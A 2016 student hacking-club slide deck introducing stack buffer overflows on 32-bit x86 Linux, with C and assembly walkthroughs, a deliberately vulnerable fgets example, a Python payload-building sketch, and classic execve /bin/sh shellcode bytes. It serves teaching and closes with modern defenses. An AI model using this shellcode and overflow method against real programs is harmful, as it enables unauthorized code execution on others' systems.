Intro to Binary Exploitation
Mark Mossberg
NU Hacks
Spring 2016
github.com/hacks/ibe2016
whoami
- Senior computer engineering major
- Low level enthusiast
- CTF casual
- Mostly with Shellphish
- http://vmresu.me
Agenda
- Introduction
- Background Info
- Crash course in C, x86
- Stack buffer overflow
- Vulnerability
- Exploitation
- Workshop
Disclaimers
- All information provided in this presentation exists for educational purposes only.
- This is not "modern" exploitation.
- Much of the following is only relevant for x86 Linux.
What is Binary Exploitation?
Binary exploitation is the art of bending a computer program to your will
From https://picoctf.com/learn
What is Binary Exploitation?
- Binary: Executable file containing a computer program in the form of machine code (assembled processor instructions)
- Exploitation: Taking advantage of a vulnerability in a computer program in order to cause unintended behavior (Wikipedia)
Unintended behavior?
- Read: "Arbitrary Code Execution"
- Primary objective of exploitation
- "Code" == Processor Instructions
- Basically, take over their CPU and force it to do whatever we want.
- The code we execute is called the "payload"
High Level Challenges
- Hijack program's execution flow
- Perform arbitrary computation
C
- Created in the 1970s for writing UNIX
- Imperative, statically typed, compiled
- "Low level", largely used for systems programming
- Widespread
- Operating Systems
- Embedded Systems
- Network Services
- Programming Languages 🐍
- Memory unsafe
For more extensive background, see http://github.com/rpisec/mbe
C Strings
- No real "string" type, just NUL-terminated char arrays
- "NUL-terminated" == ends with a '\0' char
- many libc APIs oriented around this
- String operations: strcpy(), strcat(), strlen(), etc
- I/O operations: fgets(), puts(), printf(), etc
- Bug prone :)
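// this is not good C,
// just illustrating buffers
#include <stdio.h>
#include <string.h>

void hello(void) {
    char message[10];             // room for 9 chars + NUL terminator
    strcpy(message, "Hello\n");   // copies 7 bytes, including the NUL
    printf("%s", message);
}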
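To see what "NUL-terminated char array" means byte by byte, here is a minimal Python sketch using the standard ctypes module. It models the 10-byte message buffer from hello(); the variable names are illustrative, not part of the original talk.

```python
import ctypes

# Stand-in for `char message[10]` after strcpy(message, "Hello\n").
message = ctypes.create_string_buffer(b"Hello\n", 10)

raw_bytes = message.raw      # all 10 bytes of the array, zero padding included
c_string = message.value     # bytes up to (not including) the first NUL
c_strlen = len(c_string)     # what strlen(message) would report

print(raw_bytes)
print(c_string, c_strlen, ctypes.sizeof(message))
```

The array is always 10 bytes; the "string" is only whatever comes before the first '\0'. Nothing in the array itself records either length, which is why the libc string functions have to trust the terminator.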
x86
- 32-bit CPU architecture designed by Intel
- Defines a set of "instructions" available for programs to use: low-level operations like arithmetic and memory access
- Defines a set of "registers" for computation and state (think hardware variables)
- Important ones: esp (stack ptr), ebp (frame ptr), eip (instruction ptr)
- Little endian
- In memory, numbers are stored least significant byte first
- Will be relevant when writing our exploit payload
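A short sketch of what little endian looks like in practice, using Python's standard struct module. The address is just an example 32-bit value chosen for illustration.

```python
import struct

address = 0x080483CB                  # example 32-bit address (illustrative)
packed = struct.pack("<I", address)   # "<I" = little-endian unsigned 32-bit int

print(packed.hex())                   # byte order as it would sit in memory
round_trip = struct.unpack("<I", packed)[0]
```

The least significant byte (0xcb) comes first in memory. An address written into an exploit payload has to be laid out the same way.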
C Compilation: Stack Variables
void myfunction(void) {
    // local, stack variables.
    int a = 1;
    int b = 2;
    int c = 3;
}
- Function local variables allocated in "stack" memory
- The compiler implements this by subtracting the space needed (in bytes) from the esp (stack ptr) register
- Stack grows down (toward lower addresses)
080483cb <myfunction>:
80483cb: push ebp
80483cc: mov ebp,esp
80483ce: sub esp,0x10
80483d1: mov DWORD PTR [ebp-0x4],0x1
80483d8: mov DWORD PTR [ebp-0x8],0x2
80483df: mov DWORD PTR [ebp-0xc],0x3
80483e6: leave
80483e7: ret
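The register arithmetic in that prologue can be followed with a few lines of Python. This is only a sketch: the starting esp value is hypothetical (real values differ from run to run), and the offsets are the ones shown in the disassembly.

```python
# Hypothetical stack pointer on entry to myfunction.
esp = 0xBFFFF000

esp -= 4        # push ebp: esp drops by 4 and the old ebp is stored there
ebp = esp       # mov ebp, esp
esp -= 0x10     # sub esp, 0x10: reserve 16 bytes for locals

# Locals are addressed relative to ebp, at the offsets from the listing.
locals_ = {"a": ebp - 0x4, "b": ebp - 0x8, "c": ebp - 0xC}
for name, addr in locals_.items():
    print(f"{name} lives at {addr:#x}")
```

All three locals land between esp and ebp, at addresses lower than the saved frame pointer.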
C Compilation: Function Calls
void myfunction2(int a, int b, int c);  // declare before use

void myfunction1(void) {
    myfunction2(1, 2, 3);
}
void myfunction2(int a, int b, int c) {
    a = 0xff; b = 0xff; c = 0xff;
}
080483cb <myfunction1>:
80483cb: push ebp
80483cc: mov ebp,esp
80483ce: sub esp,0x8
80483d1: sub esp,0x4
80483d4: push 0x3
80483d6: push 0x2
80483d8: push 0x1
80483da: call 80483e4 <myfunction2>
80483df: add esp,0x10
80483e2: leave
80483e3: ret
080483e4 <myfunction2>:
80483e4: push ebp
80483e5: mov ebp,esp
80483e7: mov DWORD PTR [ebp+0x8],0xff
80483ee: mov DWORD PTR [ebp+0xc],0xff
80483f5: mov DWORD PTR [ebp+0x10],0xff
80483fc: pop ebp
80483fd: ret
- "cdecl" calling convention
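- Caller pushes arguments onto the stack (right to left), then executes the call instruction
- call pushes the return address (the address of the next instruction) onto the stack, then jumps to its operand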
- Callee sets up new frame with ebp/esp. At end of function, it restores stack, and execs ret
- ret pops stack into eip
- This is how functions know where to return to
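The call sequence above can be traced with a toy model of the stack. This is a sketch, not an emulator: memory is a plain dict, the starting register values are hypothetical, and the code addresses are taken from the disassembly.

```python
memory = {}  # toy memory: address -> 32-bit value
regs = {"esp": 0xBFFFF000, "ebp": 0xBFFFF010, "eip": 0x080483D4}  # hypothetical start

def push(value):
    regs["esp"] -= 4
    memory[regs["esp"]] = value

def pop():
    value = memory[regs["esp"]]
    regs["esp"] += 4
    return value

# Caller (myfunction1): push arguments right to left, then call.
for arg in (3, 2, 1):
    push(arg)
push(0x080483DF)             # call: push the return address...
regs["eip"] = 0x080483E4     # ...and jump to myfunction2

# Callee prologue.
push(regs["ebp"])            # push ebp
regs["ebp"] = regs["esp"]    # mov ebp, esp

# Arguments sit above the saved ebp and the return address.
args = [memory[regs["ebp"] + off] for off in (0x8, 0xC, 0x10)]
saved_return = memory[regs["ebp"] + 0x4]

# Callee epilogue.
regs["ebp"] = pop()          # pop ebp
regs["eip"] = pop()          # ret: pop the return address into eip
```

After the epilogue, eip holds whatever value was sitting in the return address slot. ret does not check where that value came from.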
Takeaway: Program execution control data is stored on stack!
Memory Unsafety
- C does not stop you from trampling your own memory
- You crash if you're lucky
- Programmer's responsibility to ensure safety, not language's
- Memory Corruption: when the contents of a memory location are unintentionally modified due to programming errors
- ex: Writing off the end of an array
Definition from https://en.m.wikipedia.org/wiki/Memory_corruption
void func(void) {
    int arr[4];
    for (int i = 0; i < 8; i++) {
        arr[i] = 0xffffffff;
    }
}
Corrupting stack memory!
A compiler will typically accept it, though (writing past the end of the array is undefined behavior)
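To make the damage concrete, here is a toy model of func's stack frame as a Python bytearray. The layout (arr directly below the saved ebp and return address) and the saved values are assumptions for illustration; a real compiler may add padding or reorder things.

```python
import struct

ARR_SIZE = 4 * 4  # int arr[4], four bytes per int

# Toy frame, low addresses first: arr | saved ebp | return address | caller's data
frame = bytearray(ARR_SIZE)
frame += struct.pack("<I", 0xBFFFF010)   # saved ebp (hypothetical)
frame += struct.pack("<I", 0x080483DF)   # return address (hypothetical)
frame += bytes(8)                        # a slice of the caller's frame

for i in range(8):                       # same loop bound as the C code
    struct.pack_into("<I", frame, 4 * i, 0xFFFFFFFF)

saved_ebp, return_address = struct.unpack_from("<II", frame, ARR_SIZE)
print(hex(saved_ebp), hex(return_address))
```

Iterations 0 to 3 fill arr. Iterations 4 to 7 keep going and overwrite the saved ebp, the return address, and part of the caller's frame.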
Spot the bug
void func(void) {
    // 15 byte string + NUL
    char buf[16];
    // read up to 165 bytes + NUL from stdin
    fgets(buf, 166, stdin);
    printf("Hello %s\n", buf);
}
What's dangerous about this code?
The user controls up to 150 bytes past the end of buf (including the return address!)
Stack Buffer Overflows
- Result from bugs that allow more data to be written to a stack buffer than the space allocated for it
- Commonly seen in C string handling
- Dangerous, because program control info is stored on stack (ret addr) and could be corrupted
High Level Challenges
- ✅ Hijack program's execution flow
- Perform arbitrary computation
Exploitation
- Use buffer overflow to copy our payload onto the stack
- Corrupt the return address on the stack to point to it
- When function returns, our payload executes
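The three steps above can be sketched as a payload builder. Everything concrete here is an assumption for illustration: the 16-byte buf is taken from the "Spot the bug" example, the frame layout (buf, then saved ebp, then return address) is assumed, BUF_ADDR is a made-up address that would normally be found with a debugger, and the "code" is a placeholder rather than real shellcode.

```python
import struct

BUF_SIZE = 16                # char buf[16] from the vulnerable function
RET_OFFSET = BUF_SIZE + 4    # assumed layout: buf, saved ebp, return address
BUF_ADDR = 0xBFFFEFE0        # hypothetical address of buf on the stack

code = b"\xCC" * 25          # placeholder payload (int3 breakpoints)

# buf is too small to hold the code, so place it just past the return address.
new_ret = BUF_ADDR + RET_OFFSET + 4
payload = b"A" * RET_OFFSET            # fill buf and the saved ebp
payload += struct.pack("<I", new_ret)  # overwrite the return address
payload += code                        # the code the new address points at

print(len(payload), payload.hex())
```

Two sanity checks matter for an fgets-based overflow: the payload has to fit in the 165 bytes fgets will read, and it must not contain a newline, since fgets stops reading there.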
High Level Challenges
- ✅ Hijack program's execution flow
- ✅ Perform arbitrary computation
Exploit Payload ("Shellcode")
- What code should we put on the stack?
- Code that executes a shell! (Gives us access to the system)
- Note: Payloads don't have to exec a shell to be called shellcode
- Traditionally written in assembly due to constraints (small size, position independence, avoiding bytes that would cut the input short)
Exploit Payload ("Shellcode")
- How will our shellcode execute a shell?
- How does any program execute any other program?
- execve()
System Calls
- System Call: The interface programs use for calling into the Operating System
- Programs use syscalls for anything that touches the outside world (files, network, processes)
- If we want our exploit payload to do anything, it will need to trigger a syscall
- "execve" is syscall used to execute other programs
- Triggered by architecture specific instructions
- For x86, we'll use "int 0x80"
- execve(char *filename, char *argv[], char *envp[]);
- Arg 1: Path to file to execute
- "/bin/sh"
- Arg 2: Array of program arguments
- {"/bin/sh", NULL}
- Arg 3: Array of environment vars
- NULL
- Set syscall arguments in registers before triggering syscall instruction
- eax = syscall # (0xb)
- ebx = filename
- ecx = argv
- edx = envp
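The same call is available from Python as os.execve, which makes the three arguments easy to experiment with before writing any assembly. A minimal sketch, with function names that are illustrative only:

```python
import os

def execve_args():
    """Return (filename, argv, envp) matching the arguments listed above."""
    filename = "/bin/sh"
    argv = ["/bin/sh"]   # Python supplies the terminating NULL itself
    envp = {}            # empty environment, standing in for NULL
    return filename, argv, envp

def spawn_shell():
    # Replaces the current process with /bin/sh; does not return on success.
    os.execve(*execve_args())
```

Calling spawn_shell() from an interactive Python session drops you into a shell in place of the interpreter. That is the behavior the shellcode reproduces without any libc or interpreter underneath it.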
Writing Shellcode
- Write in C
- Hand compile to x86
- Assemble to machine code
char *args[] = {"/bin/sh", NULL};
execve(args[0], args, NULL);
; I didn't write this, I found it on the
; internet a while ago
xor eax,eax        ; int eax = 0
push eax           ; NUL terminator for the string
push 0x68732f2f    ; "//sh"  (with the push above, these three
push 0x6e69622f    ; "/bin"   create "/bin//sh\0" on the stack)
mov ebx,esp        ; char *ebx = "/bin//sh";
push eax           ; argv[1] = NULL
push ebx           ; argv[0] = "/bin//sh"
mov ecx,esp        ; char **ecx = {"/bin//sh", NULL};
mov edx,eax        ; char **edx = NULL (envp)
mov al,0xb         ; 0xb is syscall number for execve
int 0x80           ; trigger syscall
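The machine code this listing assembles to can be sanity-checked in a few lines of Python. This sketch only inspects the bytes and never executes them; the hex string is the assembled form of the eleven instructions above.

```python
import struct

sc = bytes.fromhex(
    "31c050682f"
    "2f7368682f"
    "62696e89e3"
    "505389e189"
    "c2b00bcd80"
)

# The two pushed constants, laid out in memory order (little endian).
path = struct.pack("<II", 0x6E69622F, 0x68732F2F)

has_nul = b"\x00" in sc        # NUL would end a C string copy early
has_newline = b"\n" in sc      # newline would end an fgets read early
print(len(sc), path, has_nul, has_newline)
```

The doubled slash pads the path to exactly eight bytes, so it fills two 32-bit pushes with no zero bytes. xor eax,eax and mov al,0xb are used for the same reason: they produce 0 and 0xb without embedding NUL bytes in the code.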
# bytes literals keep the payload as raw bytes (also under Python 3)
sc = (b"\x31\xc0\x50\x68\x2f" +
      b"\x2f\x73\x68\x68\x2f" +
      b"\x62\x69\x6e\x89\xe3" +
      b"\x50\x53\x89\xe1\x89" +
      b"\xc2\xb0\x0b\xcd\x80")
Modern Defenses
- DEP/NX (Data Execution Prevention/No eXecute)
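- Hardware supported: data memory such as the stack is marked non-executable
- ASLR (Address Space Layout Randomization)
- Randomizes the base addresses of the stack, heap, and libraries, so the addresses of stack variables change between runs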
- Stack Cookies/Canaries
- Compiler inserts code to check integrity of stack before returning from functions
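As a rough illustration of the stack cookie idea, here is a toy model in Python. The frame layout, the canary value, and the helper names are all assumptions made for this sketch; real canaries are chosen randomly per process and checked by compiler-generated code, not by a function like this.

```python
import struct

BUF_SIZE = 16
CANARY = b"\x00\x7f\x3a\xc1"   # fixed here for repeatability; random in practice

def make_frame(return_address):
    # Toy layout, low addresses first: buf | canary | saved ebp | return address
    return bytearray(BUF_SIZE) + CANARY + struct.pack("<II", 0xBFFFF010, return_address)

def canary_intact(frame):
    return bytes(frame[BUF_SIZE:BUF_SIZE + 4]) == CANARY

frame = make_frame(0x080483DF)
ok_before = canary_intact(frame)

# A linear overflow has to run through the canary to reach the return address.
overflow = b"A" * BUF_SIZE + b"BBBB" + b"CCCC" + struct.pack("<I", 0xDEADBEEF)
frame[:len(overflow)] = overflow
ok_after = canary_intact(frame)

print(ok_before, ok_after)
```

The return address is still overwritten, but the check fails before the function returns, so the program can abort instead of jumping to the attacker's address.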
Local vs Remote Exploits
- Local Exploit: Exploiting a program running on the same machine
- Privilege Escalation
- Remote Exploit: Exploiting a program running on a different machine (over a network)
- Jailbreakmes
That was a lot! Let's pwn some stuff.
Questions?/Workshop
By offlinemark
NU Hacks talk, 3/31/16.